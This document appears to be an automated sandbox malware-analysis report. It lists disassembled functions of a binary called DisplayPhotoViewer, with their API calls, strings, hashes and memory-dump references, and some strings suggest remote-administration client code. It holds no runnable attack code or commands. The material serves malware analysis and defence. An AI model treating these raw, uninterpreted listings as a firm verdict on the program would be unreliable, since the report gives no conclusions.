                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: MessagePost$__wcstoi64
                                                                                                    • String ID: Client$UnloadMirrorOnEndView$V
                                                                                                    • API String ID: 1802880851-3348770396
                                                                                                    • Opcode ID: 0bdca05b332994eeb3c536bf901a0ab82a1e44d1fb44b8e6e0ba9670a0da9962
                                                                                                    • Instruction ID: 571ea163b8d1066a636673f4c77c47fd5d3d2b550a205948b634962d692ba2bc
                                                                                                    • Opcode Fuzzy Hash: 0bdca05b332994eeb3c536bf901a0ab82a1e44d1fb44b8e6e0ba9670a0da9962
                                                                                                    • Instruction Fuzzy Hash: 9441E475B02221ABD611DBA0CC81FAEB7A9FF89B08F108166F61857284DB707900CBD5
                                                                                                    Function 110F14C0 Relevance: 15.8, APIs: 3, Strings: 6, Instructions: 71sleepCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • _memset.LIBCMT ref: 110F14E1
                                                                                                    • GetOEMCP.KERNEL32(0BA6C1B8,DBCS,PhysicalFonts,874, 862,?,?,?), ref: 110F1521
                                                                                                      • Part of subcall function 1105FE80: _strtok.LIBCMT ref: 1105FEC0
                                                                                                      • Part of subcall function 1105FE80: _strtok.LIBCMT ref: 1105FEF0
                                                                                                    • Sleep.KERNEL32(000000C8,?,?,?), ref: 110F1594
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: _strtok$Sleep_memset
                                                                                                    • String ID: 874, 862$Client$DBCS$PhysicalFonts$SendPhysicalFonts$h
                                                                                                    • API String ID: 3726282246-1113141960
                                                                                                    • Opcode ID: 77d2aecb9fa9b97934e023db63773808de1bc1eacc80edcd04c514e05b5be3d4
                                                                                                    • Instruction ID: 002dfb7bc2e952d089ecd9f38d70e7df896b0c6c9bfc8e21921cc2deb7eae6c7
                                                                                                    • Opcode Fuzzy Hash: 77d2aecb9fa9b97934e023db63773808de1bc1eacc80edcd04c514e05b5be3d4
                                                                                                    • Instruction Fuzzy Hash: C421D874E4021AAFDB51DBA4DC81FFAB7B4DB45708F0042A8F915D72C4EA31A954CB91
                                                                                                    Function 11155410 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 50windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • CreateCompatibleDC.GDI32(00000000), ref: 11155414
                                                                                                    • GetDeviceCaps.GDI32(00000000,0000000E), ref: 1115543D
                                                                                                    • GetDeviceCaps.GDI32(00000000,0000000C), ref: 11155447
                                                                                                    • GetDeviceCaps.GDI32(00000000,00000026), ref: 11155477
                                                                                                    • GetDeviceCaps.GDI32(00000000,00000068), ref: 11155483
                                                                                                    • CreatePalette.GDI32(111DEC88), ref: 1115549E
                                                                                                    • DeleteDC.GDI32(00000000), ref: 111554AA
                                                                                                      • Part of subcall function 11027F50: GetLastError.KERNEL32(?,00000000,?), ref: 11027F6C
                                                                                                      • Part of subcall function 11027F50: wsprintfA.USER32 ref: 11027FB7
                                                                                                      • Part of subcall function 11027F50: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11027FF3
                                                                                                      • Part of subcall function 11027F50: ExitProcess.KERNEL32 ref: 11028009
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: CapsDevice$Create$CompatibleDeleteErrorExitLastMessagePaletteProcesswsprintf
                                                                                                    • String ID: ..\ctl32\WPALETTE.C$hdc
                                                                                                    • API String ID: 147420939-1500643223
                                                                                                    • Opcode ID: ada1a3c2c8b7c32df664ea09b4888e3bf01d738551bb0bae54d135815dfebb68
                                                                                                    • Instruction ID: 65b8cdd2d762fe6bf531c506537c6c5b4dc03d351ba7ffbff25fbb1bc70c0600
                                                                                                    • Opcode Fuzzy Hash: ada1a3c2c8b7c32df664ea09b4888e3bf01d738551bb0bae54d135815dfebb68
                                                                                                    • Instruction Fuzzy Hash: 6F01DD71A4363066EBA15B699C8DF8DFE65EB4631FF054431E920D6184DB765040CB51
                                                                                                    Function 110179A0 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 158COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • std::_Xinvalid_argument.LIBCPMT ref: 110179C0
                                                                                                      • Part of subcall function 11155C43: std::exception::exception.LIBCMT ref: 11155C58
                                                                                                      • Part of subcall function 11155C43: __CxxThrowException@8.LIBCMT ref: 11155C6D
                                                                                                      • Part of subcall function 11155C43: std::exception::exception.LIBCMT ref: 11155C7E
                                                                                                    • _memmove.LIBCMT ref: 11017A47
                                                                                                    • _memmove.LIBCMT ref: 11017A6B
                                                                                                    • _memmove.LIBCMT ref: 11017AA5
                                                                                                    • _memmove.LIBCMT ref: 11017AC1
                                                                                                    • std::exception::exception.LIBCMT ref: 11017B0B
                                                                                                    • __CxxThrowException@8.LIBCMT ref: 11017B20
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: _memmove$std::exception::exception$Exception@8Throw$Xinvalid_argumentstd::_
                                                                                                    • String ID: deque<T> too long
                                                                                                    • API String ID: 827257264-309773918
                                                                                                    • Opcode ID: 793b90c0b0b580cdead7fee2d6302a10aa151a89893be38e46c4507fcc2018b3
                                                                                                    • Instruction ID: 272ed01510383d5c1bd495e3242dc8a26c8ef96b7745876e3463912857a5344f
                                                                                                    • Opcode Fuzzy Hash: 793b90c0b0b580cdead7fee2d6302a10aa151a89893be38e46c4507fcc2018b3
                                                                                                    • Instruction Fuzzy Hash: 2141B776E00505ABDB44CEA8CC81AAEB7EAEFC4214F59C569DC15DB308FA74EA018790
                                                                                                    Function 11009640 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 148fileCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 110B24C0: GetModuleHandleA.KERNEL32(kernel32.dll,ProcessIdToSessionId,00000000,00000000), ref: 110B24E6
                                                                                                      • Part of subcall function 110B24C0: GetProcAddress.KERNEL32(00000000), ref: 110B24ED
                                                                                                      • Part of subcall function 110B24C0: GetCurrentProcessId.KERNEL32(00000000), ref: 110B2503
                                                                                                    • wsprintfA.USER32 ref: 1100967F
                                                                                                    • wsprintfA.USER32 ref: 11009699
                                                                                                    • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 11009783
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: wsprintf$AddressCreateCurrentFileHandleModuleProcProcess
                                                                                                    • String ID: %s%s.htm$.%u$ApprovedWebList$Store\
                                                                                                    • API String ID: 559337438-1872371932
                                                                                                    • Opcode ID: 1e79c462439c0550afdc4cf0f2438d6d2a3ac00161aa75a70227d734537a262f
                                                                                                    • Instruction ID: 036c6595aed68349ad2b1db4cf8e96d10811a228d68a03215efde5e100bb1447
                                                                                                    • Opcode Fuzzy Hash: 1e79c462439c0550afdc4cf0f2438d6d2a3ac00161aa75a70227d734537a262f
                                                                                                    • Instruction Fuzzy Hash: 5551F631E0425E9FDB16CF68DC91BDABBE4AB4A344F0081E5D94DDB241FA309A44CBE0
                                                                                                    Function 110D1160 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 147networkCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 110D7BA0: EnterCriticalSection.KERNEL32(111E0C5C,11017238,218EC38C,?,?,?,111C0108,1117BDB8,000000FF,?,11019202), ref: 110D7BA1
                                                                                                      • Part of subcall function 11010D50: _memmove.LIBCMT ref: 11010D8D
                                                                                                    • shutdown.WSOCK32(?,00000002,00000000,00000000,00000000), ref: 110D11D9
                                                                                                    • closesocket.WSOCK32(?), ref: 110D11E3
                                                                                                    • __CxxThrowException@8.LIBCMT ref: 110D1209
                                                                                                    • _memset.LIBCMT ref: 110D125C
                                                                                                    • gethostname.WSOCK32(?,00000200,0000005C,00000000,111E0BE8), ref: 110D1270
                                                                                                    • gethostbyname.WSOCK32(?), ref: 110D12A1
                                                                                                    • inet_ntoa.WSOCK32 ref: 110D12CC
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: CriticalEnterException@8SectionThrow_memmove_memsetclosesocketgethostbynamegethostnameinet_ntoashutdown
                                                                                                    • String ID: 127.0.0.1
                                                                                                    • API String ID: 3213037012-3619153832
                                                                                                    • Opcode ID: c2d9d80238a34a81907b30d8128e9743708a8453648ea7d928b5b644bf873253
                                                                                                    • Instruction ID: b1c65a194cdb50525830e936a7434970eb1928dc3388b5017c8dcba46dfd53a0
                                                                                                    • Opcode Fuzzy Hash: c2d9d80238a34a81907b30d8128e9743708a8453648ea7d928b5b644bf873253
                                                                                                    • Instruction Fuzzy Hash: 5E51D8B5900358AFCB20DFA4DC84BDEFBB9FB48714F40466DE51697680DB74AA48CB90
                                                                                                    Function 110C7330 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 143COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 110C738D
                                                                                                    • BeginDeferWindowPos.USER32(?), ref: 110C73AF
                                                                                                    • GetWindowRect.USER32(?,?), ref: 110C73D9
                                                                                                    • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 110C7406
                                                                                                    • DeferWindowPos.USER32(?,?,00000000,?,?,?,?,00000017), ref: 110C7495
                                                                                                      • Part of subcall function 11027F50: GetLastError.KERNEL32(?,00000000,?), ref: 11027F6C
                                                                                                      • Part of subcall function 11027F50: wsprintfA.USER32 ref: 11027FB7
                                                                                                      • Part of subcall function 11027F50: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11027FF3
                                                                                                      • Part of subcall function 11027F50: ExitProcess.KERNEL32 ref: 11028009
                                                                                                    • EndDeferWindowPos.USER32(00000000), ref: 110C74B1
                                                                                                    Strings
                                                                                                    • m_hWnd, xrefs: 110C7378
                                                                                                    • e:\nsmsrc\nsm\1201\1201f2\ctl32\wndclass.h, xrefs: 110C7373
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Window$Defer$Rect$BeginErrorExitLastMessagePointsProcesswsprintf
                                                                                                    • String ID: e:\nsmsrc\nsm\1201\1201f2\ctl32\wndclass.h$m_hWnd
                                                                                                    • API String ID: 553022447-1557312927
                                                                                                    • Opcode ID: 36ebf96d56ef107ebef8ff79e2d63526ceee99fa97b2b2ae03fff31a59b45d2c
                                                                                                    • Instruction ID: eecc1d5743466b242e0d1adc666891c8c4a4b6909e4b9010b9b3a738dd652962
                                                                                                    • Opcode Fuzzy Hash: 36ebf96d56ef107ebef8ff79e2d63526ceee99fa97b2b2ae03fff31a59b45d2c
                                                                                                    • Instruction Fuzzy Hash: F251D1B5D00A09AFCB10CFA9D985A9EFBF5BF88714F148259E855A7644C730B841CFA4
                                                                                                    Function 110671E0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 130COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: __fread_nolock_fseek$_free_malloc_memset
                                                                                                    • String ID: PCIR
                                                                                                    • API String ID: 2419779768-1011558323
                                                                                                    • Opcode ID: 28ce7027b2f0b1a0428cb0109600466e3bd925d5d5d171087073955f09152b5b
                                                                                                    • Instruction ID: baad75821f58102a79a5e411f0d5ec96f38712958703bea0f707118dc0e7c982
                                                                                                    • Opcode Fuzzy Hash: 28ce7027b2f0b1a0428cb0109600466e3bd925d5d5d171087073955f09152b5b
                                                                                                    • Instruction Fuzzy Hash: B141E675E017059BEB50CFA5CC41BDEBBBAEF81708F204069FC19AB340EA71A941C795
                                                                                                    Function 110673C0 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 121timeCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetLocalTime.KERNEL32(?,?,00000001), ref: 11067450
                                                                                                    • wsprintfA.USER32 ref: 110674A1
                                                                                                    • wvsprintfA.USER32(00000000,00000000,?), ref: 110674D0
                                                                                                    • _fputs.LIBCMT ref: 11067535
                                                                                                      • Part of subcall function 1113B0A0: ExpandEnvironmentStringsA.KERNEL32(?,?,00000104,?), ref: 1113B0C7
                                                                                                      • Part of subcall function 111592B7: __fsopen.LIBCMT ref: 111592C4
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: EnvironmentExpandLocalStringsTime__fsopen_fputswsprintfwvsprintf
                                                                                                    • String ID: %02d-%s-%02d %02d:%02d:%02d $..\ctl32\Connect.cpp$MODEM.LOG$_tcslen (buf) < _tsizeof (buf)
                                                                                                    • API String ID: 2115059068-1537580878
                                                                                                    • Opcode ID: 845d9c894ba22a103bb5a20bd0c1c5e066b2274dbbecf200f58031c5f5ba18e2
                                                                                                    • Instruction ID: 5bf6e2984e430cc436706e2fe9c3bf79207d30e77b5f730aad0b94a4cfd6cf5b
                                                                                                    • Opcode Fuzzy Hash: 845d9c894ba22a103bb5a20bd0c1c5e066b2274dbbecf200f58031c5f5ba18e2
                                                                                                    • Instruction Fuzzy Hash: 614127B590051D9ACB55CF64CC84FFEB7B8AF44308F0085E9ED195B145FA309AC9CBA5
                                                                                                    Function 1113D2F0 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 113threadCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    • EAX=%08X EBX=%08X ECX=%08X EDX=%08X ESI=%08XEDI=%08X EBP=%08X ESP=%08X EIP=%08X FLG=%08XCS=%04X DS=%04X SS=%04X ES=%04X FS=%04X GS=%04X TID=%XEIP:, xrefs: 1113D37D
                                                                                                    • %02X , xrefs: 1113D3C2
                                                                                                    • Callstack:, xrefs: 1113D3DF
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: wsprintf$CurrentReadThread
                                                                                                    • String ID: Callstack:$%02X $EAX=%08X EBX=%08X ECX=%08X EDX=%08X ESI=%08XEDI=%08X EBP=%08X ESP=%08X EIP=%08X FLG=%08XCS=%04X DS=%04X SS=%04X ES=%04X FS=%04X GS=%04X TID=%XEIP:
                                                                                                    • API String ID: 477357799-160799177
                                                                                                    • Opcode ID: 85f64b8c36865edf5830f15241233646391ebd7f2dc4060bfb2681933bb9f207
                                                                                                    • Instruction ID: d74afcb4cdfaf82b80e113ab981f38a864310c22b470073b0366c7627867f552
                                                                                                    • Opcode Fuzzy Hash: 85f64b8c36865edf5830f15241233646391ebd7f2dc4060bfb2681933bb9f207
                                                                                                    • Instruction Fuzzy Hash: 7A411AB2610705AFDB54CFA8DC80F9BB7E9AF88315F048518F95EC7245EA70B914CB61
                                                                                                    Function 11015400 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 113COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • SetPropA.USER32(?,?), ref: 1101546F
                                                                                                      • Part of subcall function 11027F50: GetLastError.KERNEL32(?,00000000,?), ref: 11027F6C
                                                                                                      • Part of subcall function 11027F50: wsprintfA.USER32 ref: 11027FB7
                                                                                                      • Part of subcall function 11027F50: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11027FF3
                                                                                                      • Part of subcall function 11027F50: ExitProcess.KERNEL32 ref: 11028009
                                                                                                      • Part of subcall function 11015190: BeginPaint.USER32(?,?), ref: 110151BF
                                                                                                      • Part of subcall function 11015190: GetWindowRect.USER32(?,?), ref: 110151D7
                                                                                                      • Part of subcall function 11015190: _memset.LIBCMT ref: 110151E5
                                                                                                      • Part of subcall function 11015190: CreateFontIndirectA.GDI32(?), ref: 11015201
                                                                                                      • Part of subcall function 11015190: SelectObject.GDI32(00000000,00000000), ref: 11015215
                                                                                                      • Part of subcall function 11015190: SetBkMode.GDI32(00000000,00000001), ref: 11015220
                                                                                                      • Part of subcall function 11015190: BeginPath.GDI32(00000000), ref: 1101522D
                                                                                                      • Part of subcall function 11015190: TextOutA.GDI32(00000000,00000000,00000000), ref: 11015250
